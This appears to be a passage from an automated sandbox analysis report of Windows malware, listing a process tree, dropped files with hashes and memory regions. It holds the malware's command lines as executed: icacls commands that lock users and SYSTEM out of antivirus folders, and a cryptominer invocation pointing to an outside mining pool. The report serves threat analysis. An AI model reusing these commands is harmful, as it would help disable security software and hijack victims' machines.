                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
                                                                                                                  4⤵
                                                                                                                    PID:4560
                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                      icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
                                                                                                                      5⤵
                                                                                                                      • Modifies file permissions
                                                                                                                      PID:1652
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
                                                                                                                    4⤵
                                                                                                                      PID:2568
                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                        icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
                                                                                                                        5⤵
                                                                                                                        • Modifies file permissions
                                                                                                                        PID:3064
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
                                                                                                                      4⤵
                                                                                                                        PID:4024
                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                          icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
                                                                                                                          5⤵
                                                                                                                          • Modifies file permissions
                                                                                                                          PID:4368
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
                                                                                                                        4⤵
                                                                                                                          PID:380
                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                            icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
                                                                                                                            5⤵
                                                                                                                            • Modifies file permissions
                                                                                                                            PID:876
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
                                                                                                                          4⤵
                                                                                                                            PID:3116
                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                              icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
                                                                                                                              5⤵
                                                                                                                              • Modifies file permissions
                                                                                                                              PID:5080
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
                                                                                                                            4⤵
                                                                                                                              PID:3416
                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
                                                                                                                                5⤵
                                                                                                                                • Modifies file permissions
                                                                                                                                PID:1372
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
                                                                                                                              4⤵
                                                                                                                                PID:3428
                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                  icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
                                                                                                                                  5⤵
                                                                                                                                  • Modifies file permissions
                                                                                                                                  PID:2956
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
                                                                                                                                4⤵
                                                                                                                                  PID:4760
                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                    icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
                                                                                                                                    5⤵
                                                                                                                                    • Modifies file permissions
                                                                                                                                    PID:1204
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                  4⤵
                                                                                                                                    PID:1888
                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                      icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                      5⤵
                                                                                                                                      • Modifies file permissions
                                                                                                                                      PID:1640
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
                                                                                                                                    4⤵
                                                                                                                                      PID:4104
                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                        icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
                                                                                                                                        5⤵
                                                                                                                                        • Modifies file permissions
                                                                                                                                        PID:364
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                      4⤵
                                                                                                                                        PID:4580
                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                          icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                          5⤵
                                                                                                                                          • Modifies file permissions
                                                                                                                                          PID:1968
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
                                                                                                                                        4⤵
                                                                                                                                          PID:5028
                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                            icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
                                                                                                                                            5⤵
                                                                                                                                            • Modifies file permissions
                                                                                                                                            PID:1864
                                                                                                                                        • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                          C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                          4⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Adds Run key to start application
                                                                                                                                          • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                          PID:1224
                                                                                                                                  • C:\Programdata\RealtekHD\taskhost.exe
                                                                                                                                    C:\Programdata\RealtekHD\taskhost.exe
                                                                                                                                    1⤵
                                                                                                                                    • Modifies visiblity of hidden/system files in Explorer
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Drops file in System32 directory
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                    PID:3552
                                                                                                                                    • C:\Programdata\WindowsTask\winlogon.exe
                                                                                                                                      C:\Programdata\WindowsTask\winlogon.exe
                                                                                                                                      2⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:1984
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /C schtasks /query /fo list
                                                                                                                                        3⤵
                                                                                                                                          PID:4136
                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            schtasks /query /fo list
                                                                                                                                            4⤵
                                                                                                                                              PID:3852
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c ipconfig /flushdns
                                                                                                                                          2⤵
                                                                                                                                            PID:4104
                                                                                                                                            • C:\Windows\system32\ipconfig.exe
                                                                                                                                              ipconfig /flushdns
                                                                                                                                              3⤵
                                                                                                                                              • Gathers network information
                                                                                                                                              PID:4660
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c gpupdate /force
                                                                                                                                            2⤵
                                                                                                                                              PID:952
                                                                                                                                              • C:\Windows\system32\gpupdate.exe
                                                                                                                                                gpupdate /force
                                                                                                                                                3⤵
                                                                                                                                                  PID:1888
                                                                                                                                              • C:\ProgramData\WindowsTask\MicrosoftHost.exe
                                                                                                                                                C:\ProgramData\WindowsTask\MicrosoftHost.exe -o stratum+tcp://185.139.69.167:3333 -u RandomX_CPU --donate-level=1 -k -t4
                                                                                                                                                2⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:2688
                                                                                                                                            • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                              C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                              1⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:2948

                                                                                                                                            Network

                                                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                                                            Replay Monitor

                                                                                                                                            Loading Replay Monitor...

                                                                                                                                            Downloads

                                                                                                                                            • C:\ProgramData\RealtekHD\taskhost.exe

                                                                                                                                              Filesize

                                                                                                                                              1.7MB

                                                                                                                                              MD5

                                                                                                                                              de88d7ec667dea756d236e9053d7eeb9

                                                                                                                                              SHA1

                                                                                                                                              ac6b619acece942f27d75e1e0ea46b94bc9b91a9

                                                                                                                                              SHA256

                                                                                                                                              7ce418c4a92d459b2a1971bd32ac4dfea3711393b1dce49d0c92d7124d71e157

                                                                                                                                              SHA512

                                                                                                                                              5c655def3bb5ab9c0255802e0c40667f16ef48f1042ff1c57e13199b38f0059cbff33517d6e940c39ca7d16d346830a92800e89058ae58ee02826472b0935942

                                                                                                                                            • C:\ProgramData\RealtekHD\taskhostw.exe

                                                                                                                                              Filesize

                                                                                                                                              2.9MB

                                                                                                                                              MD5

                                                                                                                                              53f8233b58b8e3ba3e92d82cca29f119

                                                                                                                                              SHA1

                                                                                                                                              ea7cae955f884aab7d048b6297fc0e472bb94a76

                                                                                                                                              SHA256

                                                                                                                                              a114d6bccc183021671bbb15426cf227ec487f2379094ed6f19e4211efd3ce65

                                                                                                                                              SHA512

                                                                                                                                              d1d4f385be4c8b8bdd16c8a8cc1fb75b6cee094ce69633724a4f53255dc560983097d26dc3b4d3e44a0eb718ac8ddb8d37c3b80f2c8747810f9c873ced558b23

                                                                                                                                            • C:\ProgramData\Setup\update.exe

                                                                                                                                              Filesize

                                                                                                                                              7.8MB

                                                                                                                                              MD5

                                                                                                                                              36aadfa2332dc7e5077455ae5cb423ef

                                                                                                                                              SHA1

                                                                                                                                              47cdc34d12f4820a005bba735caed72296d2400a

                                                                                                                                              SHA256

                                                                                                                                              2240022c8262345cf4f7280141f53fc6fcc29b5436cf72a03581906665b9dda9

                                                                                                                                              SHA512

                                                                                                                                              4dfaae0949f7c362221d14d3d080e8eaa5d7a2e43892aec653f1045c2044a0d24390704774748ab7d1252ba8f3dea5008970f1e0d879ce3b3dc190002db2f56c

                                                                                                                                            • C:\ProgramData\WindowsTask\MicrosoftHost.exe

                                                                                                                                              Filesize

                                                                                                                                              2.0MB

                                                                                                                                              MD5

                                                                                                                                              a74ad3584394b0766ada52191b245013

                                                                                                                                              SHA1

                                                                                                                                              6b25f4ba2c86541d4e2e5872a63fa1005373966b

                                                                                                                                              SHA256

                                                                                                                                              1e66a4b8154bf4559ec8745bee4130906e0dfeb3ea4992c7bb8d217d2b662737

                                                                                                                                              SHA512

                                                                                                                                              5976aa8dd83547613a1a2fff40e4c6ac0c4aff2eb55995e65c5d532768e714504be848a95f055512d1a044527e053ab81bf5c07725f6b7406a5c5c10b26e1be6

                                                                                                                                            • C:\ProgramData\WindowsTask\WinRing0x64.sys

                                                                                                                                              Filesize

                                                                                                                                              14KB

                                                                                                                                              MD5

                                                                                                                                              0c0195c48b6b8582fa6f6373032118da

                                                                                                                                              SHA1

                                                                                                                                              d25340ae8e92a6d29f599fef426a2bc1b5217299

                                                                                                                                              SHA256

                                                                                                                                              11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

                                                                                                                                              SHA512

                                                                                                                                              ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\aut5A9E.tmp

                                                                                                                                              Filesize

                                                                                                                                              381KB

                                                                                                                                              MD5

                                                                                                                                              ec0f9398d8017767f86a4d0e74225506

                                                                                                                                              SHA1

                                                                                                                                              720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36

                                                                                                                                              SHA256

                                                                                                                                              870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375

                                                                                                                                              SHA512

                                                                                                                                              d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484

                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\aut6A92.tmp

                                                                                                                                              Filesize

                                                                                                                                              5.5MB

                                                                                                                                              MD5

                                                                                                                                              ebe2c898363c9e42908504bf053ad018

                                                                                                                                              SHA1

                                                                                                                                              9b02d448e534d6078f117db09c7ceca3c63e8ea5

                                                                                                                                              SHA256

                                                                                                                                              f034d58596cbb1023b31c891bce2b14207700fa27fd1d5836b177327c9755175

                                                                                                                                              SHA512

                                                                                                                                              c8d23c03869541cf6f2d108ab00b790286f95b23d729a7d44a3b0cf75ba497831b0c1cbc6860e0d51e2d49edb03a2a9c3ee0272a7cc679ffd4f963df03010b86

                                                                                                                                            • C:\Windows\System32\drivers\etc\hosts

                                                                                                                                              Filesize

                                                                                                                                              4KB

                                                                                                                                              MD5

                                                                                                                                              e335b19dd00855d6d352f8c0512bab33

                                                                                                                                              SHA1

                                                                                                                                              335f886a166b852beeb1dfec3d27eeced4a11547

                                                                                                                                              SHA256

                                                                                                                                              8f16e9d38dd11092dd0ef01e91c551aa15d161396e84c9b534de8d646118028d

                                                                                                                                              SHA512

                                                                                                                                              ef8cda0161d1be8a84942e20689163a880e3d95f7914a6c80f9b2714ca26fe5cbb677a2341ad5bda203e0cbad71b3df9a068e2accfc2164d132adfbdbb9adbcd

                                                                                                                                            • C:\Windows\System32\drivers\etc\hosts

                                                                                                                                              Filesize

                                                                                                                                              1KB

                                                                                                                                              MD5

                                                                                                                                              9901c0bbfe99666fac8ca6b3abbc6800

                                                                                                                                              SHA1

                                                                                                                                              7f17ae9ee3fe111213cb391cb380b51b8d298f9c

                                                                                                                                              SHA256

                                                                                                                                              1517e364d470f3bd25be8c0ca8714b4cf5ca70995f4d932041a001da8dde2622

                                                                                                                                              SHA512

                                                                                                                                              a3aaf2a55e35632575f5b6337def0135557a8b42141824dfc0a77484a58eed03b8004249bc2028e81f3e4c5cedae2853bc24d46a1418253c0969484c57f5915e

                                                                                                                                            • C:\programdata\microsoft\temp\H.bat

                                                                                                                                              Filesize

                                                                                                                                              5KB

                                                                                                                                              MD5

                                                                                                                                              ec45b066a80416bdb06b264b7efed90d

                                                                                                                                              SHA1

                                                                                                                                              6679ed15133f13573c1448b5b16a4d83485e8cc9

                                                                                                                                              SHA256

                                                                                                                                              cbb4167540edebdb3ac764114da3a2d5173b6ae351789640b15fd79e0f80659e

                                                                                                                                              SHA512

                                                                                                                                              0b8aa1084912c167b8eab066edd7823016dd0214fb0cf97ededad6c462169995942d286c918f296e87fb499f495081901643722bd2b5872d5668a220d08c4f2c

                                                                                                                                            • memory/1984-533-0x00000000004F0000-0x00000000005DC000-memory.dmp

                                                                                                                                              Filesize

                                                                                                                                              944KB

                                                                                                                                            • memory/1984-539-0x00000000004F0000-0x00000000005DC000-memory.dmp

                                                                                                                                              Filesize

                                                                                                                                              944KB

                                                                                                                                            • memory/2688-555-0x000002200C2B0000-0x000002200C2C0000-memory.dmp

                                                                                                                                              Filesize

                                                                                                                                              64KB